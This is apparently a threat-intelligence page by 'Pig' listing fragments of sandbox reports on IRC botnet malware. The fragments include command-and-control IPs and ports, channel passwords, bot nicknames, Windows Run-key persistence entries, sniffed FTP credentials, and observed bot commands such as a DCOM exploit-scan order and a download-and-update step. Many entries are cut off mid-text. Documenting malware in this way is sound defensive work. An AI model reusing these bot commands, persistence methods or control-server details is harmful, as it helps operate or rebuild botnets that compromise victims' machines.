Author: Pig

(IRC) [00|FRA|881622]: Bot sniff “95.142.163.184:6667” ircd here “:VirUs-pqrquk!VirUs@151.81.7.141 JOIN :#VirUs.aLiS# “ (IRC) [00|FRA|881622]: Bot sniff “95.142.163.184:6667” “:VirUs-khnmlc!VirUs@190.73.73.197 JOIN :#VirUs.aLiS# “

3.68.16.30:80 – :norks.org 001 bfqiebwf :Welcome to the Internet Relay Network bfqiebwf -psniff- suspicious BOT packet from: 74.117.174.110:21321 ircd here – :cbl-sd-74-1.aster.com.do 302 ] [laMer][lnwhcdrj :][laMer][lnwhcdrj=+~laMerl@122-120-130-36.dynamic.hinet.net -psniff- suspicious BOT packet from: 74.117.174.82:16667 – ircd here :s11.cpe.netcabo.uk 404 [M][TWN]XP-SP1[00]1694 #l# :You must have a registered nick (+r) to talk on this channel (#l#)

Remote Host Port Number 178.63.148.49 6667 NICK n{USA|XP}793757 USER 7937 “” “TsGh” :7937 JOIN #Adam Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Update System = “%AppData%winlogon.exe” + UserFaultCheck = “%System%dumprep 0 -u” so that winlogon.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Windows Update System = “%AppData%winlogon.exe” soRead more...

95.154.242.89:4244″ “:HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125 :FRA|2045414!gfgjbblu@41.141.112.125 JOIN :##neo## :HTTP1.4 332 FRA|2045414 ##neo## :&psniff on :HTTP1.4 333 FRA|2045414 ##neo## Coded 1288523091 :HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125 :HTTP1.4 302 FRA|2045414 :FRA|2045414=+gfgjbblu@41.141.112.125 “

72.20.51.198:6667″: – “JOIN #die chanpass MODE [FRA|00|P|88890] -ix JOIN #die chanpass MODE [FRA|00|P|88890] -ix JOIN #die chanpass MODE [FRA|00|P|88890] -ix JOIN #die chanpass “

78.129.228.56:65267: – “JOIN #NzM# screwu nick:[M]ESP|00|XP|SP3|9898708 [M]ESP|00|XP|SP3|3576563 #NzM# :.root.start dcom135 200 0 0 219.x.x.x -a -r -s :Fooker.net 333 [M]ESP|00|XP|SP3|3576563 #NzM# weebz

Remote Host Port Number 212.175.158.43 6667 PASS lnx Resolved : [1.sarkievi.net] To [212.175.158.43] MODE [00|USA|227819] -ix JOIN #Cd# NhG NICK [00|USA|227819] USER XP-7853 * 0 :COMPUTERNAME Now talking in #Cd# Topic On: [ #Cd# ] [ .msn.msg Foto 😀 http://to.ly/7Lkw?= ] Topic By: [ Samuray ] Other details * The following port was open inRead more...

Remote Host Port Number 46.4.245.19 6667 NICK n{USA|XP}303134 USER 3031 “” “TsGh” :3031 JOIN #Awesome leonanenad15963 PONG :BoTNeT.GoV Other details * The following port was open in the system: Port Protocol Process 1053 TCP taskeng.exe (%AppData%taskeng.exe) Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Update System = “%AppData%taskeng.exe” so thatRead more...

Remote Host Port Number 109.235.49.157 80 109.235.49.236 21 109.235.49.236 35254 * The data identified by the following URLs was then requested from the remote web server: o http://global-blog.net/2.php?p1=COMPUTERNAME_cnew05ORTN&p2=.. o http://global-blog.net/2.php?p1=COMPUTERNAME_cnew05ORTN&p2=. USER rnew05@net4speed.net USER cnew05@net4speed.net 00000000 | 5041 5353 2063 6E25 7724 7033 3364 4021 | PASS cn%w$p33d@! 00000010 | 40E0 E133 3432 0D0A 5057 440DRead more...

Remote Host Port Number 67.202.108.130 6567 s1m0n3t4 67.202.109.164 80 MODE [SI|USA|00|P|34779] -ix JOIN #nuevocsm# c1rc0dus0leil PRIVMSG #nuevocsm# :[Dl]: File download: 84.0KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_83035.exe @ 84.0KB/sec. QUIT [Update]: Updating to new bin. NICK [SI|USA|00|P|51927] USER XP-2630 * 0 :COMPUTERNAME MODE [SI|USA|00|P|51927] -ix JOIN #xd# c1rc0dus0leil NICK [SI|USA|00|P|34779] USER XP-7375 * 0 :COMPUTERNAME MODE [SI|USA|00|P|38552] -ix JOINRead more...